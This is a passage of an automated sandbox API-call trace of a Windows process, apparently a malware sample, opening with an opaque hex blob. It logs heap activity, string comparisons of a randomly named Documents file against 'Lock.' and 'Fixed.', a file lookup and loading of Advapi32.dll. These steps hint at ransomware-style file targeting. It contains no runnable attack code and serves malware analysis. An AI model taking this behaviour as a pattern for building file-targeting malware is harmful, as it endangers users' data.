\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0266.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.001] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0266.003] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.003] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0266.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0266.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0266.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0266.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rq5tKC1of8p4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q5tKC1of8p4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5tKC1of8p4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tKC1of8p4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KC1of8p4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C1of8p4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1of8p4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="of8p4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f8p4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8p4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HR.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.005] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0266.005] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0266.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0266.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0266.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0266.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2a) returned 0x24b3538 [0266.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0266.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rq5tKC1of8p4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q5tKC1of8p4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5tKC1of8p4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tKC1of8p4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.006] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KC1of8p4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C1of8p4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1of8p4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="of8p4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f8p4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8p4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.007] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HR.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0266.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0266.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0266.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.008] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0266.008] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0266.008] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0266.008] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0266.008] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0266.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.009] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0266.009] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.009] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.009] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.009] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.009] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.009] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/rq5tKC1of8p4r7HR.pps", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd1de0, ftCreationTime.dwHighDateTime=0x1d4d40f, ftLastAccessTime.dwLowDateTime=0xcf36a910, ftLastAccessTime.dwHighDateTime=0x1d4cdce, ftLastWriteTime.dwLowDateTime=0xcf36a910, ftLastWriteTime.dwHighDateTime=0x1d4cdce, nFileSizeHigh=0x0, nFileSizeLow=0x71c1, dwReserved0=0xb600047, dwReserved1=0x29232, cFileName="rq5tKC1of8p4r7HR.pps", cAlternateFileName="RQ5TKC~1.PPS")) returned 0xaa57a0 [0266.010] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0266.010] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.010] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.010] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0266.010] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.010] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0266.010] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.011] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.011] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0266.011] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.011] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0266.011] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.011] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.012] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.012] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0266.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.012] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.013] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.013] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0266.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0266.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0266.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 